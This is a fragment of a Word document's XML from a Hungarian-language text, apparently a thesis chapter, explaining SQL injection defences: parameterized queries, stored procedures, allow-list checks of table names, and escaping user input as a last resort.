    <w:p w14:paraId="3E563E37" w14:textId="6130C325" w:rsidR="00B249E5" w:rsidRPr="00D47FAE" w:rsidRDefault="006C72E7" w:rsidP="00607568">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Gyakorlatias példával élve, ha vesszük a</w:t>
      </w:r>
      <w:r w:rsidR="001770F2" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004379CE" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>boolean-based</w:t>
      </w:r>
      <w:r w:rsidR="00C937B9" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> altípus </w:t>
      </w:r>
      <w:r w:rsidR="00633793" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>példáját</w:t>
      </w:r>
      <w:r w:rsidR="00511CFA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FB6BE6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">akkor </w:t>
      </w:r>
      <w:r w:rsidR="00697319" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a paraméterezett lekérdezés</w:t>
      </w:r>
      <w:r w:rsidR="006B7EA5" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00697319" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD2C42" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">használva az, </w:t>
      </w:r>
      <w:r w:rsidR="00641433" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>egy felhasználói azonosítót keresne, amely megegyezik a</w:t>
      </w:r>
      <w:r w:rsidR="00C12E7F" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> támadó által megadott</w:t>
      </w:r>
      <w:r w:rsidR="000C46C1" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00641433" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>karakterlánccal</w:t>
      </w:r>
      <w:r w:rsidR="00305F7C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, tehát nem lenne sérülékeny</w:t>
      </w:r>
      <w:r w:rsidR="00DC4931" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA8040" w14:textId="7572129F" w:rsidR="00D246D0" w:rsidRPr="00D47FAE" w:rsidRDefault="009810C7" w:rsidP="00385549">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="014A8A75" wp14:editId="69DE57A6">
            <wp:extent cx="3460750" cy="3980605"/>
            <wp:effectExtent l="0" t="0" r="635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0750" cy="3980605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="344148D6" w14:textId="3C568A69" w:rsidR="004A6EF8" w:rsidRPr="00D47FAE" w:rsidRDefault="00947DDE" w:rsidP="00BE636D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>1.2.1-es ábra:</w:t>
      </w:r>
      <w:r w:rsidR="000A639E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD709A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>példák elkészített utasításokra</w:t>
      </w:r>
      <w:r w:rsidR="00437DBC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDB916C" w14:textId="77777777" w:rsidR="00361B81" w:rsidRPr="00D47FAE" w:rsidRDefault="00361B81" w:rsidP="00BA0966">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F87810B" w14:textId="6866A536" w:rsidR="008312A8" w:rsidRPr="00D47FAE" w:rsidRDefault="008312A8" w:rsidP="00B53A21">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Tárolt eljárások (stored procedures) használata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DD05AC" w14:textId="6FF34F42" w:rsidR="00361B81" w:rsidRPr="00D47FAE" w:rsidRDefault="00361B81" w:rsidP="00BA0966">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64348A84" w14:textId="15F516A6" w:rsidR="00361B81" w:rsidRPr="00D47FAE" w:rsidRDefault="00196C1C" w:rsidP="00856A6C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A tárolt eljárások biztonságosan megvalósítva </w:t>
      </w:r>
      <w:r w:rsidR="00A1705B" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008148A3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>azaz a tárolt eljárás nem tartalmaz semmilyen nem biztonságos dinamikus SQL-t</w:t>
      </w:r>
      <w:r w:rsidR="00A1705B" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ugyanolyan hatást gyakorolnak, mint a paraméterezett lekérdezések.</w:t>
      </w:r>
      <w:r w:rsidR="007B5C60" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00856A6C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="007B5C60" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ülönbség</w:t>
      </w:r>
      <w:r w:rsidR="00856A6C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ük csupán csak annyi</w:t>
      </w:r>
      <w:r w:rsidR="007B5C60" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, hogy a tárolt eljárás SQL-kódját meghatározzák</w:t>
      </w:r>
      <w:r w:rsidR="006E193E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B5C60" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>és magában az adatbázisban tárolják, majd az alkalmazásból meghívják</w:t>
      </w:r>
      <w:r w:rsidR="000942D3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="000031F4" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>alábbiakban</w:t>
      </w:r>
      <w:r w:rsidR="000942D3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> az </w:t>
      </w:r>
      <w:r w:rsidR="000942D3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>sp_getAccountBalance</w:t>
      </w:r>
      <w:r w:rsidR="000942D3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="007B5C60" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA69B6" w14:textId="16A0C35E" w:rsidR="00053061" w:rsidRPr="00D47FAE" w:rsidRDefault="00385549" w:rsidP="00385549">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3073BAED" wp14:editId="5AD59E53">
            <wp:extent cx="4267419" cy="1155759"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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419" cy="1155759"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B1EBE8" w14:textId="2F2FEB41" w:rsidR="00053061" w:rsidRPr="00D47FAE" w:rsidRDefault="001948DD" w:rsidP="00857512">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2.2-es ábra: </w:t>
      </w:r>
      <w:r w:rsidR="00821DA5" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Java példa tárolt eljárásra</w:t>
      </w:r>
      <w:r w:rsidR="00804F42" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B41B04D" w14:textId="77777777" w:rsidR="00361B81" w:rsidRPr="00D47FAE" w:rsidRDefault="00361B81" w:rsidP="00BA0966">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2528F274" w14:textId="2AB81EA3" w:rsidR="008312A8" w:rsidRPr="00D47FAE" w:rsidRDefault="008312A8" w:rsidP="00B53A21">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747C0E1B" w14:textId="183C8901" w:rsidR="00361B81" w:rsidRPr="00D47FAE" w:rsidRDefault="00361B81" w:rsidP="00BA0966">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3AEFE0" w14:textId="317AAA3D" w:rsidR="00361B81" w:rsidRPr="00D47FAE" w:rsidRDefault="006B7EA5" w:rsidP="0080427B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Az SQL lekérdezések különböző részei </w:t>
      </w:r>
      <w:r w:rsidR="00776D92" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">néha </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">nem </w:t>
      </w:r>
      <w:r w:rsidR="0035314D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">alkalmasak </w:t>
      </w:r>
      <w:r w:rsidR="00C825B5" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>olyan</w:t>
      </w:r>
      <w:r w:rsidR="0035314D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> változó</w:t>
      </w:r>
      <w:r w:rsidR="002E20CB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="0035314D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> használatára</w:t>
      </w:r>
      <w:r w:rsidR="00292A25" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00236E81" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0025287E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>amelye</w:t>
      </w:r>
      <w:r w:rsidR="002E20CB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ket</w:t>
      </w:r>
      <w:r w:rsidR="00697D31" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> csak</w:t>
      </w:r>
      <w:r w:rsidR="0025287E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> érvényes utasítással vagy értékcímmel </w:t>
      </w:r>
      <w:r w:rsidR="00697D31" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>lehet</w:t>
      </w:r>
      <w:r w:rsidR="0025287E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> helyettesíteni, hogy az utasítás sikeresen végrehajtható legyen</w:t>
      </w:r>
      <w:r w:rsidR="007E5C60" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> („bind variables”).</w:t>
      </w:r>
      <w:r w:rsidR="00DF07DA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D1BEA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ilyen helyzetekben a</w:t>
      </w:r>
      <w:r w:rsidR="00646C08" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> bemenet </w:t>
      </w:r>
      <w:r w:rsidR="001D1BEA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ellenőrzése vagy a lekérdezés újratervezése a legmegfelelőbb védekezés.</w:t>
      </w:r>
      <w:r w:rsidR="0080427B" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D1BEA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00CD237C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z adatbázis </w:t>
      </w:r>
      <w:r w:rsidR="001D1BEA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>táblázat</w:t>
      </w:r>
      <w:r w:rsidR="00CD237C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ainak</w:t>
      </w:r>
      <w:r w:rsidR="001D1BEA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> vagy oszlop</w:t>
      </w:r>
      <w:r w:rsidR="00CD237C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ainak</w:t>
      </w:r>
      <w:r w:rsidR="001D1BEA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> neve esetén</w:t>
      </w:r>
      <w:r w:rsidR="0080427B" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> például</w:t>
      </w:r>
      <w:r w:rsidR="001D1BEA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ideális esetben az értékek a kódból származnak, és nem a felhasználói paraméterekből.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E1B270" w14:textId="5CF30A3A" w:rsidR="00961BDA" w:rsidRPr="00D47FAE" w:rsidRDefault="00961BDA" w:rsidP="00961BDA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Az alábbi példa </w:t>
      </w:r>
      <w:r w:rsidR="00655906" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">egy cikluson belül </w:t>
      </w:r>
      <w:r w:rsidR="00790AC0" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">különböző ágakban vizsgálja a </w:t>
      </w:r>
      <w:r w:rsidR="00790AC0" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">tableName </w:t>
      </w:r>
      <w:r w:rsidR="00790AC0" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>értékének lehetőségeit</w:t>
      </w:r>
      <w:r w:rsidR="0054056A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, ezzel lekorlátozva az elérhető és lekérhető táblák számát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609BA768" w14:textId="3F83358E" w:rsidR="0080427B" w:rsidRPr="00D47FAE" w:rsidRDefault="00DF0BB0" w:rsidP="00DF0BB0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="128F1A0E" wp14:editId="16E73905">
            <wp:extent cx="4292821" cy="1384371"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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2821" cy="1384371"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA6007" w14:textId="59E058F7" w:rsidR="00DF0BB0" w:rsidRPr="00D47FAE" w:rsidRDefault="00DF0BB0" w:rsidP="00DF0BB0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>1.2.3-as ábra: Java példa adatbázis</w:t>
      </w:r>
      <w:r w:rsidR="00493A95" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>tábl</w:t>
      </w:r>
      <w:r w:rsidR="00200616" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a neveinek</w:t>
      </w:r>
      <w:r w:rsidR="00961BDA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ellenőrzésére </w:t>
      </w:r>
      <w:r w:rsidR="004E7728" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746F0E3B" w14:textId="77777777" w:rsidR="008C132E" w:rsidRPr="00D47FAE" w:rsidRDefault="008C132E" w:rsidP="008C132E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="553CED0F" w14:textId="4849A1D3" w:rsidR="008312A8" w:rsidRPr="00D47FAE" w:rsidRDefault="008312A8" w:rsidP="00B53A21">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Az összes felhasználó által adott bemenet elkerülése</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD205D3" w14:textId="53365840" w:rsidR="003F6425" w:rsidRPr="00D47FAE" w:rsidRDefault="003F6425" w:rsidP="00BA0966">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E47EF7" w14:textId="46DD827D" w:rsidR="003F6425" w:rsidRPr="00D47FAE" w:rsidRDefault="002E79BA" w:rsidP="002E79BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Ennek a technikának </w:t>
      </w:r>
      <w:r w:rsidR="00B137F9" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="006D0347" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z egyszerű</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> célja, hogy elkerülje a felhasználói bevitelt, mielőtt lekérdezés</w:t>
      </w:r>
      <w:r w:rsidR="00981847" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">hez lehetne használni. </w:t>
      </w:r>
      <w:r w:rsidR="00E261B4" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Alkalmazása</w:t>
      </w:r>
      <w:r w:rsidR="002C01CF" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a fenti módszerek megvalósíthatatlansága esetén kézenfekvő</w:t>
      </w:r>
      <w:r w:rsidR="00D62801" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> lehet</w:t>
      </w:r>
      <w:r w:rsidR="002C01CF" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, ám nem garancia az SQL injection megakadályozására</w:t>
      </w:r>
      <w:r w:rsidR="00D62801" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, ún. végső lehetőséget biztosít</w:t>
      </w:r>
      <w:r w:rsidR="00057943" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B99507D" w14:textId="53B1B0A3" w:rsidR="007036A9" w:rsidRPr="00D47FAE" w:rsidRDefault="007036A9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
